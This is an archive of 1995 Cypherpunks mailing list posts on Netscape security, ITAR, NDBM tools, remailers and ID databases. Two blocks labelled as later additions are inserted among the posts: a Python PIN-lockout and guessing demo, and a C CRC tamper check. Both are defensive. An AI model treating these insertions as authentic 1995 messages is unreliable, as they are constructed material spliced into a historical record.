From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 12 Oct 95 14:39:22 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Pine.3.89.9510121517.B6143-0100000@offshore.com.ai>
Message-ID: <Pine.3.89.9510121633.A6162-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



The NYT claim was about as sensible as saying MS-DOS is the structure of
the Internet and is not safe, so the Internet is not safe.  We could as
well have viruses spreading on floppies for MS-DOS (there are far more
people on the Internet using MS-DOS than NFS) that cause your MS-DOS
Netscape to send the unencrypted credit card numbers off to a certain
anonymous email address.  Now watch, someone will try this.  Oh well.  It
really has nothing to do with the Internet or Netscape. 

I hope Markoff gets this: The fact that Internet communication is not
inherently secure does not mean that it can not be made secure.  Note that
an insecure phone-line can be made secure by using a phone with a
scrambler.  The same can be done on the Internet and is being done - by
companies like Netscape.  

By far the biggest obstacle to a secure Internet is the government's ITAR
regulations.  This has made it impractical to put real security into NFS,
FTP, Unix, and WWW.  Many of our current security problems are really due
to "the basic structure of ITAR" but none are due to the "basic structure
of the Internet". 

It sort of pains me to see this kind of hype, but it will probably push
companies to get real security faster.  So in the long run it may not be
such a bad thing.  Also, it may be easier to pressure the government to
get rid of the ITAR restrictions.  And they say any publicity is good
publicity, so it probably will not really hurt the Internet at all.  

  --  Vince

>    San Francisco, Oct. 10 -- Newly publicized weaknesses in
>    the basic structure of the Internet [...]
>[...]
>    The problem is not Netscape's alone; it potentially affects
>    any organization that operates a computer from which files
>    or software could be downloaded over the Internet. The
>    weakness can be traced to the technical underpinnings of
>    the network, [...]
> 
>    The disclosure of the flaws casts doubt on the aspirations
>    of companies like Netscape, which last summer had one of
>    the most successful stock offerings in Wall Street history
>    based on the promise of the impending arrival of a
>    full-fledged on-line marketplace.
>[...] 
>    The newly publicized weakness occurs in a widely used
>    Internet protocol -- or technical standard -- known as the
>    Network File System, or NFS. Because NFS does not have any
>    means for allowing the recipient of a program or document
>    to verify that it has not been altered during transmission
>    from the file server to the user, any interception or
>    tampering would go undetected.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Thu, 12 Oct 95 14:18:00 PDT
To: cypherpunks@toad.com
Subject: FWD: International Encryption Protocols
Message-ID: <Pine.BSD/.3.91.951012170741.12446A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


To: "Frank O'Dwyer" <fod@fws.ilo.dec.com>
cc: firewalls@GreatCircle.COM (Firewalls Mailing List)
From: Justin Mason <jmason@iona.ie>
Subject: BoS: Re: International Encryption Protocols

Frank O'Dwyer sez:

>After all, if the CoCom countries _weren't_ willing to sell each other 
>crypto equipment, how could they spy on one another?  :-)
>
>(Actually the :-) may not be necessary - I believe there was a story
> in the news recently about the UK 'authorities' snooping on Irish
> official traffic carried on UK-supplied equipment.)

Almost right -- it was the UK surveillance service (GCHQ) snooping on
Irish official traffic carried on US-supplied crypto equipment.
Apparently, the equipment in question had a "back door", courtesy of
the NSA; when GCHQ found out that the Irish govt were using this
equipment, they had only to ask their NSA pals for the details.

I only heard the details myself via a popular-science program on crypto
;), so the so-called back door may not have been a deliberately
weakened algorithm, it may have been a set of keys from a key-escrow
repository or some such.

--j.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lawrence C. Stewart" <stewart@OpenMarket.com>
Date: Thu, 12 Oct 95 14:16:21 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: (fwd) checkfree/cybercash diff
In-Reply-To: <v02120d10aca3190df3c1@[199.0.65.105]>
Message-ID: <199510122116.RAA11126@arctic.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


> But I cannot find any difference between cybercash wallet and checkfree wallet.
> Is it behind the open part of the tech information?

Probably we should wait for Donald Eastlake (Cybercash) or someone from
Checkfree to chime in here, but here's my understanding:

History:
	Cybercash has a client application, which currently handles credit
cards, and will add support for EFT payments.  The Checkfree app talks
to the Cybercash gateway to the financial nets, via merchant software.

	Checkfree/Spyglass/V-One/Tandem demo'd a "Wallet" at Spring
Internet World, which currently handles credit cards, and will add support
for bill-payment and/or check-writing, via Checkfree's service.

My understanding of the technical similarities/differences:

	The credit card handling is essentially the same as iKP/STT/SEPP, etc.
however, I think Cybercash's system hands off the card number to the
Cybercash Server and then deals in handles, while the Checkfree system
stores the card number encrypted on the PC, and passes it along each time.
If this is true, it makes the Cybercash system reasonably resilient to off-line
local password guessing attacks.

	A feature of the Checkfree thing is that it comes pre-loaded
with a whole bunch of public keys of gateway operators (current and 
prospective).  As gateway operators come on line, they are assigned a key
from the pool.  This makes it "open" to multiple gateway operators.
The implementation I saw had only a 4-digit PIN protecting the local
card-storage file, so it is not terribly secure against anyone who gets
access to the PC.  Obviously a pass-phrase would help a lot here.

My understanding of the techno-politics:

	Cybercash will adopt STT/SEPP for credit cards, abandoning its own
wire protocol.  Both Checkfree and Cybercash will share the client app, and
add their respective support for EFT, micropayments, and check-writing.

-Larry Stewart
Open Market Inc.
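
Added example, not part of the original message and not CyberCash's or CheckFree's code: a Python sketch of the handle arrangement described above, where the server keeps the card number and counts wrong PINs, so data copied from the PC permits only a few online guesses instead of an offline search of all 10,000 four-digit PINs. The lockout limit, the class and function names, and the sample card number and PIN are assumptions constructed for the illustration.

```python
import hashlib
import hmac
import secrets

PIN_SPACE = 10 ** 4              # every possible 4-digit PIN


class Locked(Exception):
    """Too many wrong PINs: the handle is frozen until the owner re-enrolls."""


class HandleServer:
    """Server side: keeps the card number and gives the PC an opaque handle."""

    MAX_FAILURES = 5             # assumed lockout policy

    def __init__(self):
        self._records = {}

    @staticmethod
    def _hash(pin, salt):
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 100_000)

    def enroll(self, card_number, pin):
        handle = secrets.token_hex(16)       # random, unrelated to the card
        salt = secrets.token_bytes(16)
        self._records[handle] = {
            "card": card_number,
            "salt": salt,
            "pin_hash": self._hash(pin, salt),
            "failures": 0,
        }
        return handle                         # the only thing the PC stores

    def authorize(self, handle, pin, amount_cents):
        rec = self._records[handle]
        if rec["failures"] >= self.MAX_FAILURES:
            raise Locked(handle)
        if not hmac.compare_digest(self._hash(pin, rec["salt"]), rec["pin_hash"]):
            rec["failures"] += 1
            raise PermissionError("wrong PIN")
        rec["failures"] = 0
        return "charged %d cents to card ending %s" % (amount_cents, rec["card"][-4:])


def guess_success_probability(guesses_allowed, space=PIN_SPACE):
    """Chance that a uniformly random PIN falls within the allowed guesses."""
    return min(guesses_allowed, space) / space


def stolen_pc_demo():
    """Replay what a copied handle allows: the server answers, then locks."""
    server = HandleServer()
    handle = server.enroll("4111111111111111", "7302")   # constructed test values
    outcomes = []
    for guess in ("0000", "1111", "1234", "2580", "9999", "7302"):
        try:
            outcomes.append(server.authorize(handle, guess, 500))
        except PermissionError:
            outcomes.append("wrong PIN")
        except Locked:
            outcomes.append("locked")
    return outcomes


if __name__ == "__main__":
    print(stolen_pc_demo())
    # A locally stored file encrypted under the PIN has no counter, so every
    # PIN can be tried against a copy of it.
    print("local file:", guess_success_probability(PIN_SPACE))
    print("handle + lockout:", guess_success_probability(HandleServer.MAX_FAILURES))
```

Even the correct PIN is refused once the counter is exhausted, which is the cost of the lockout: recovery has to go through re-enrollment.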






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 12 Oct 95 17:16:30 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: netscape 2 certification authorities
In-Reply-To: <199510122246.SAA07849@homeport.org>
Message-ID: <199510130016.RAA14262@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Adam Shostack <adam@lighthouse.homeport.org> writes:
> The new betas of Netscape store CA trust stuff in a NDBM
> database.  Does anyone have good tools for looking at NDBM stuff?

Perl's my favorite.  Here's a code fragment that might help.  All you
need to do is open the ndbm file (foo.pag/foo.dir in this case) and aim it
at an associative array, then have your way with it.

	Jim Gillogly
	Sterday, 22 Winterfilth S.R. 1995, 00:14
----------------------------------------------------------------------------
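#!/usr/bin/perl

# Bind the ndbm file (foo.pag/foo.dir) to the associative array %baz
dbmopen(%baz, "foo", 0600) || die "Cannot open foo: $!\n";

# At this point just access %baz the way you would any other assoc array
# For example, to list it all:

while (($key, $value) = each %baz)
{
	# print rather than printf: a stored key or value may contain '%'
	print "Key $key, value $value\n";
}

dbmclose(%baz);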

----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 12 Oct 95 14:35:07 PDT
To: cypherpunks@toad.com
Subject: Identity database, another attempt...
Message-ID: <Pine.SOL.3.91.951012172747.18484C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, you ungrateful wretches objected to our great 
employment database and national ID card plans when they 
were presented as a means of immigration control.  How 
about this, then:  We need an employment-tracking 
database and licenses for everything so we can crack
down on "deadbeat dads."  Now that sounds more plausible,
doesn't it!

Please?  We really want to track you closely.  It's for 
your own good, you know.


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
AP reported on 10/12/95:

  Deadbeat parents beware: Pay up or lose your license. And not 
  just your driver's license. Your hunting, fishing, trapping,
  boating, occupational and professional licenses may be taken 
  away too. 
   
  That's the promise that Congress, intensifying the fight against 
  parents who refuse to support their children, intends to send to 
  millions of deadbeats as it writes final legislation to transform 
  the nation's anti-poverty programs. ...
 
  Central to [House and Senate proposals ...] is a requirement that 
  every state have a program to revoke or restrict the licenses of 
  parents who fail to pay, along with a central registry to track 
  new hiring and match employment records with child support 
  obligations.  ...

[Can you say "10th Amendment," Robert Dole?  I knew you could!
You are against this, aren't you Bob?  Bob?  Bob??!!]


  The Department of Health and Human Services ...  estimates that if
  every state had a license revocation program in place, child support
  collections would grow by $2.5 billion over 10 years. 

[During which time the federal government will spend $20,000 billion.
Relative peanuts, in other words.]


  According to HHS, 32 states and Puerto Rico now have laws on the books to
  restrict or revoke driving privileges and professional, occupational or
  sporting licenses. ...     ^^^^^^^^^^


[Note that driving, necessary for living in most places, is now a 
*privilege* granted by the government.  In other words, *living* is
a government-granted privilege.]

  Paula Roberts, a child support expert with the Center for Law and 
  Social Policy, a liberal research and advocacy group in Washington, 
  said license revocation programs can be effective -- but only if 
  states have the necessary computers in place.  ...




Essay questions for extra credit:  

(1.) Explain how an advocate of the proposed system of monitoring 
and control could be considered "liberal."  

Or "conservative."


(2.) How many (ab)uses of this system are possible and
how long will it take for them to be implemented?


(3.) Compare and contrast this plan with the Soviet 
internal passport / labor book system.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 12 Oct 95 14:39:20 PDT
To: cypherpunks@toad.com
Subject: Anguilla Cypherpunks Meeting
Message-ID: <Pine.3.89.9510121731.A6228-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


ANGUILLA CYPHERPUNKS MEETING

The meeting will be held at my house, Sunday Oct 29.  My address is "Old
Ta".  Really, we have only a couple named streets in this country and no
street signs or addresses.  My area is called "Old Ta" because the Old
Water Tower was near me. :-) If you don't know where I live you are
probably off-island, and I can just pick you up at the airport.  You are
welcome to stay the week around the meeting (like Oct 25 to Nov 1 or some
such). 

Anguilla is a fantastic little country in the Caribbean with wonderful
beaches and no taxes.  I have been living here for almost a year now and
just love it.  Right now American Airlines has some specials on that make
flying to Anguilla a bit cheaper than normal.  For example: 

   New York to Anguilla $365.95 rt
   San Jose to Anguilla $574.95 rt

For these prices the tickets must be purchased by Oct 16th. 

Please let me know if you are coming so I will be sure to have enough
space.  If we get too many people we may need some air mattresses or
something.  It is warm here, so sleeping bags are not needed. 

If while you are outside the USA you want to write some software that uses
encryption and sell it worldwide, let me know.  I could put you up while
you wrote it and my company could sell it for a share of the selling price. 
Let me know what you are thinking of and how long you think it would take. 

   --  Vince







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 12 Oct 95 10:09:37 PDT
To: cypherpunks@toad.com
Subject: Aquaria wars ?
Message-ID: <9510121708.AA00880@elysion.eiss.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



I need some historical information for a discussion about which
security features are to be used in usenet. Perhaps someone can help:


Some (many) years ago there was a very large and long flamewar at the
usenet. As far as I know it was called "The Aquaria Wars" because it
began with a debate about the question whether the newsgroup should be
named "alt.aquaria" or "alt.aquarium". I am looking for historical
information about this flamewar.

Can anyone remember it or is there anything available about it?

Thanks a lot

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 15:43:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: netscape 2 certification authorities
Message-ID: <199510122246.SAA07849@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The new betas of Netscape store CA trust stuff in a NDBM
database.  Does anyone have good tools for looking at NDBM stuff?


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 12 Oct 95 16:12:07 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Identity database, another attempt...
In-Reply-To: <Pine.SOL.3.91.951012172747.18484C-100000@use.usit.net>
Message-ID: <Pine.SUN.3.91.951012190532.19320A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Oct 1995, Brad Dolan wrote:

>   restrict or revoke driving privileges and professional, occupational or
>   sporting licenses. ...     ^^^^^^^^^^
> 
> 
> [Note that driving, necessary for living in most places, is now a 
> *privilege* granted by the government.  In other words, *living* is
> a government-granted privilege.]

Luckily other governments will still grant you driving licenses so you 
just have to take a foreign trip.

It's clear that the Federal Job Licensing system is meant to be 
extended to denial of work rights for deadbeat dadism, tax evasion, 
overdue library books, whatever.  Certainly encourages self employment.

DCF

"Do you have a moral right to register your kid.  Wait till he grows up 
and ask him if he wants to be registered."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 12 Oct 95 19:30:06 PDT
To: zoetrope@infinet.com
Subject: Re: Netscape beta 2.0
In-Reply-To: <m0t3YoM-000K8BC@mail.infinet.com>
Message-ID: <199510130224.TAA04729@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Hey those shirts aren't measly! They're high quality Fruit of
the Loom shirts, limited edition, etc. etc. Personalized even. Just
ask the people who have received them. (Non-us winners haven't received
them yet, I haven't shipped them yet.)

> 
>         For Finding a security bug in Netscape, is it true you only get a
> measly shirt? if that is true why not just start a virus?  
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 16:51:37 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: netscape 2 certification authorities
In-Reply-To: <199510122246.SAA07849@homeport.org>
Message-ID: <199510122351.TAA22805@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	The new betas of Netscape store CA trust stuff in a NDBM
> database.  Does anyone have good tools for looking at NDBM stuff?

Perl treats NDBM files as if they are internal arrays if you ask it to
-- I often examine strange NDBM files this way. It's pretty convenient
for the task.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 03:33:21 PDT
To: jirib@cs.monash.edu.au
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510120358.NAA14220@sweeney.cs.monash.edu.au>
Message-ID: <199510120905.AA47595@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> all a True Name is really necessary for
>> is violence.  (And, pending certain eagerly-awaited technological
>> developments, for sex.))
>Why is a true name necessary for sex? It should be feasible to arrange
>a romantic rendezvous without True Names, no?
>How often have you checked IDs before going on a date?
>(I think most normal people would notice a MITM during, er, never mind.)
>Anything I've missed?

Does the swapping of DNA keys on a patrol cars hood constitute sufficient
LEA monitoring? You can even deliver them your key if you think you can
run fast enough. This might be a situation where they would prefer you use
encryption wrappers rather than a cleartext transfer.

Safe swapping.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Thompson <stevet@ultratech.net>
Date: Thu, 12 Oct 95 17:14:38 PDT
To: John Young <jya@pipeline.com>
Subject: Re: GOB_ble
In-Reply-To: <199510091151.HAA05403@pipe4.nyc.pipeline.com>
Message-ID: <Pine.LNX.3.91.951012201116.14431D-100000@crimethink.ultratech.net>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
Steve Thompson       
BOFH, System Admin,        Nothing indicates shoddy workmanship
ultratech.net              more than lumps in the duct tape.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 03:41:31 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <"swan.cl.cam.:277260:951012071149"@cl.cam.ac.uk>
Message-ID: <199510120923.AA47909@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> Not possible. Reporters don't call you for a quote and then send you a draft
>> of the article for your approval before they publish. They call for a quote,
>> write their article, and publish, not asking for approval.
>
>Depends how well you train them !

Let's train them. Someone post their email addresses so we can send them all
the RFCs for their education. :) They need to know what the hell they are
talking about.

I wonder if the biology lists get this, some wannabe hero posting how billions
of people are infected with deadly toxins just because some researcher
mentioned a well known fact that an amount of various bacteria and toxins
exist in all living mammals.

Werd.
Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C.CREUTZIG@BIONIC.zerberus.de (Christopher Creutzig)
Date: Fri, 13 Oct 95 18:44:07 PDT
To: cypherpunks@toad.com
Subject: Re: List of reliable remailers
In-Reply-To: <199510091350.GAA12733@kiwi.cs.berkeley.edu>
Message-ID: <zp8102aBYnuqZ16d@bionic02.bionic.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


RL> ford     remailer@bi-node.zerberus.de     *+               6:37  10.73%

 The problem should be fixed. I had asked the remailer to use a
non-existent temp dir, so it just quit silently...

---
Christopher Creutzig                | c.creutzig@bionic.zerberus.de
PGP-encrypted messages preferred -- use envelopes!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 12 Oct 95 21:20:20 PDT
To: cypherpunks@toad.com
Subject: Serial port radiation detector?
Message-ID: <199510130416.VAA01611@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Sometime back during the RNG discussion I thought I saw mention of a radiation
detector that would plug into a PC's serial port and was fairly inexpensive.
Any information about this would be appreciated.
-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David HM Spector <spector@zeitgeist.com>
Date: Thu, 12 Oct 95 18:20:14 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Pine.3.89.9510121633.A6162-0100000@offshore.com.ai>
Message-ID: <199510130119.VAA02267@zeitgeist.zeitgeist.com>
MIME-Version: 1.0
Content-Type: text/plain




The real problem seems to be that Markoff (with whom I have spoken
often in the past, and who actually *IS* a competent reporter -- usually)
seems to have taken a number of interviews with various people and
combined them, out of order with no real context into an Internet
boogey-man story.

The reason I say this is simply from the quotes by Jeff Schiller (and
the "Netscape spokesman") -- they were most certainly talking about
the recent discovery of problems with Netscape.  The "NFS" silliness,
and the thought that NFS is the mechanism by which  Internet  users
download files seems to have been stitched in for the scare value.
(We won't even get into the real-time file hijacking, etc.)

I am surprised that Jeff Schiller isn't all over this (and other lists)
spitting bullets considering the way he was (mis)quoted.

On the other hand, it could well be that John wrote a different story
and his *editors* at the NY Times decided with, um, how to put this
delicately... re-ordered the story.. um, er I mean edited it.  It
happens all the time to make stories more "effective."  (Most old
newspaper folks are scared to death of this technology and take what
swipes at it they can, whenever they can.)

BTW: If you're really unhappy with Markoff, let him know what you
think of his reporting... his email addresses used to be:

	       markoff@nyt.com and johnm@well.sf.ca.us
	

regards,
  David


PS: Whatever I just said is my opinion, which should be obvious, since
it's coming from my home machine(s) which are funded by me
personally... and not whomever I happen to work for from 9 to 5...

PPS: BTW John, in case you're reading this, (and anyone else) you DO
NOT HAVE PERMISSION TO QUOTE ME... period!  In fact, this posting is
Copyright (c) 1995 by David HM Spector and may not be reprinted in
whole or in part without my express written permission.  I have a
copyright lawyer; she's really good, on retainer, and loves a good
brawl....
-----------------------------------------------------------------------------
David HM Spector				Software Developer & Nice Guy
http://zeitgeist.com				spector@zeitgeist.com
voice: +1 212.721.6974				fax: +1 212.721.9084
                               --------
SJM, 32, seeks SJF for meaningful rel... What? This ISN'T the VOICE personals?!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 18:25:49 PDT
To: cypherpunks@toad.com
Subject: Netscape beta 2.0
Message-ID: <m0t3YoM-000K8BC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        For Finding a security bug in Netscape, is it true you only get a
measly shirt? if that is true why not just start a virus?  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 18:35:43 PDT
To: JonathanZ@consensus.com (Jonathan Zamick)
Subject: Re: IDEA algorithm
In-Reply-To: <v02120d01aca45743fb66@[157.22.240.13]>
Message-ID: <199510130138.VAA08180@homeport.org>
MIME-Version: 1.0
Content-Type: text



| This may be an odd question, but who is it that owns the IDEA algorithm?
| 
| We've had a number of requests regarding licensing RSAREF tying into
| legitimizing PGP products. Part of that includes IDEA obviously.

	Dr Peter Profos
	Ascom-Tech AG, Solothurn Lab
	Postfach 151
	4502 Solothurn, Switzerland
	v. +41 65 242 885
	fax _41 65 235 761

	Now go buy a copy of Applied Cryptography, which answers this
and other questions you might have. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 18:46:09 PDT
To: cypherpunks@toad.com
Subject: Security
Message-ID: <m0t3Z7g-000KAPC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        In response to Aleph one's message Nothing is totally secure....The
only security on the internet is being off-line....We can just make it
harder to hack but hackers evolve and adapt.......






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@netcom.com (Ed Carp)
Date: Thu, 12 Oct 95 22:06:55 PDT
To: cypherpunks@toad.com
Subject: looking for anti-tamper software
Message-ID: <199510130455.VAA29233@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I used to have this C source that I could embed in a program, and it
would tell me if the software had been tampered with at runtime.  I've
lost/mislaid/whatever the source, and I was wondering if anyone had anything
that would do the same thing.  As I recall, it calculated a simple CRC and
embedded it into the .EXE file (it was written for MS-DOS).

It doesn't need to be cryptographically secure - I just need to check to see
if the executable has been corrupted.  I've leafed through alt.sources and
comp.sources.*.

Thanks in advance...
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes
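
The kind of check described in the message above, as an added example that is not part of the original post and is not the lost source it mentions: a CRC-32 is computed over the image and stored in a trailer, and the program recomputes it at run time. The trailer layout (`CRCK` magic plus little-endian CRC appended to the file) and all function names are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed trailer layout: 4-byte magic "CRCK" + 4-byte little-endian CRC-32. */
#define TRAILER_LEN 8u
static const unsigned char TRAILER_MAGIC[4] = { 'C', 'R', 'C', 'K' };

enum check_result { IMAGE_OK = 0, IMAGE_NO_TRAILER = 1, IMAGE_CORRUPT = 2 };

/* Standard CRC-32 (reflected polynomial 0xEDB88320), one bit at a time. */
uint32_t crc32_buf(const unsigned char *p, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;
    while (len--) {
        crc ^= *p++;
        for (int bit = 0; bit < 8; bit++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return crc ^ 0xFFFFFFFFu;
}

/* Append the trailer to an image of `len` bytes held in a buffer of `cap`
   bytes. Returns the sealed length, or 0 if the trailer does not fit. */
size_t seal_image(unsigned char *img, size_t len, size_t cap)
{
    if (cap < len || cap - len < TRAILER_LEN)
        return 0;
    uint32_t crc = crc32_buf(img, len);
    memcpy(img + len, TRAILER_MAGIC, 4);
    for (int i = 0; i < 4; i++)
        img[len + 4 + i] = (unsigned char)(crc >> (8 * i));
    return len + TRAILER_LEN;
}

/* Recompute the CRC over everything before the trailer and compare it
   with the stored value. */
enum check_result check_image(const unsigned char *img, size_t len)
{
    if (len < TRAILER_LEN ||
        memcmp(img + len - TRAILER_LEN, TRAILER_MAGIC, 4) != 0)
        return IMAGE_NO_TRAILER;
    size_t body = len - TRAILER_LEN;
    uint32_t stored = 0;
    for (int i = 0; i < 4; i++)
        stored |= (uint32_t)img[body + 4 + i] << (8 * i);
    return crc32_buf(img, body) == stored ? IMAGE_OK : IMAGE_CORRUPT;
}

/* Read a whole file (normally the program's own path) and check it.
   Returns a check_result, or -1 if the file cannot be read. */
int check_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f)
        return -1;
    int rc = -1;
    unsigned char *buf = NULL;
    if (fseek(f, 0, SEEK_END) == 0) {
        long size = ftell(f);
        if (size >= 0 && fseek(f, 0, SEEK_SET) == 0) {
            buf = malloc(size ? (size_t)size : 1);
            if (buf && fread(buf, 1, (size_t)size, f) == (size_t)size)
                rc = (int)check_image(buf, (size_t)size);
        }
    }
    free(buf);
    fclose(f);
    return rc;
}

int main(int argc, char **argv)
{
    /* Constructed sample bytes standing in for an executable image. */
    unsigned char img[64] = "MZ constructed sample image";
    size_t sealed = seal_image(img, strlen((char *)img), sizeof img);

    printf("freshly sealed:  %d\n", check_image(img, sealed));
    img[5] ^= 0x01;                       /* simulate one corrupted bit */
    printf("after bit flip:  %d\n", check_image(img, sealed));

    /* Self-check: reports IMAGE_NO_TRAILER until a build step seals the file. */
    if (argc > 0 && argv[0])
        printf("self-check of %s: %d\n", argv[0], check_file(argv[0]));
    return 0;
}
```

As the message itself notes, a CRC catches accidental corruption only; anyone who changes the file on purpose can recompute the trailer.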



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 21:59:36 PDT
To: cypherpunks@toad.com
Subject: The Economist on Netscape "hackers"
Message-ID: <199510130458.VAA16480@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Looks like every cypherpunk's favorite newsweekly has slipped a
bit.

   This week's Economist (Oct 7-13, 1995, pp. 77-78) has a story about
banks getting on the Internet, and some of the security risks
involved. It's not _too_ bad, but, well, judge for yourself:

   "By far their biggest worry, however, is the threat posed by
computer hackers. In recent months, numerous defects have been
detected in the state-of-the-art Navigator program developed by
Netscape, the leading maker of Internet ``browsing'' software. Earlier
this year, a French hacker broke the program's code, albeit with the
help of 120 computers. Although Netscape claims that the glitches in
Navigator have now been smoothed out, their very existence has shaken
confidence. ..."

   Sigh. No mention of export restrictions (I wanted to add "of
course," but for the Economist it shouldn't be an "of course"). Shall
I write the letter to the editor, or does someone else want to? One
thing I'll need is a brief outline of Damien Doligez's achievements to
support the idea that characterizing him as a "hacker" is not quite
right.

Raph (who's wondering if there's something inherent in the media
process that keeps them from getting their stories straight)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 12 Oct 95 22:07:56 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
Message-ID: <9510130504.AA17156@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: zoetrope@infinet.com
> 
> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?
> 
For the cyphergroupies of course...they rule!  Some day I'm going to write
a book about the better known, shall I say "famous" ones, and then I'll
be a bazillionaire...oh yeah, that's the other reason I'm on cypherpunks,
to get rich!  (Did I mention fame?)  And they serve a great breakfast too!
You can get anything you want at the cypherpunks restaurant, ta da da da da
da da, you can...help me help me Mr. Blobby, I think my neural nets are
insufficiently trained! Bzzzt!

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
